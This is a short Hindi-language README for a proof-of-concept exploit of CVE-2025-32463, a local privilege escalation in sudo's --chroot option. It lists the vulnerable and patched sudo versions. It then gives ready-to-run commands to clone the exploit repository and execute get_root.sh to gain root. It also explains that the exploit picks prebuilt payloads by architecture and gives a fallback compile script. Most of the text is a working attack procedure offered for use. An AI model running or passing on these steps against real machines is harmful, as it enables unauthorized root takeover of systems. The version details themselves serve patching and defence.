
- असुरक्षित: sudo 1.9.14, 1.9.15, 1.9.16, 1.9.17 - पैच किया गया: sudo 1.9.17p1 और बाद के संस्करणों में - 1.9.14 से पुराने लीगेसी संस्करण प्रभावित नहीं हैं, क्योंकि वे --chroot विकल्प का समर्थन नहीं करते हैं।
# get_root.sh और get_root.py दोनों एक ही काम करते हैं।
git clone https://github.com/shazed-x/CVE-2025-32463
cd CVE-2025-32463
./get_root.sh
लक्ष्य मशीन पर gcc की आवश्यकता नहीं है। PoC वर्तमान आर्किटेक्चर (जैसे, x86_64, aarch64) की जाँच करके काम करता है, फिर संबंधित डायनामिक रूप से प्री-कंपाइल किए गए पेलोड को निष्पादित करता है। यदि वह विफल हो जाता है, तो यह स्टैटिक पेलोड का उपयोग करता है।
यदि एक्सप्लॉइट आपकी मशीन पर विफल हो जाता है, तो आप इसे अभी भी निम्न का उपयोग करके कंपाइल कर सकते हैं:
./mkall-dynamic.sh
# फिर चलाएँ
./get_root.sh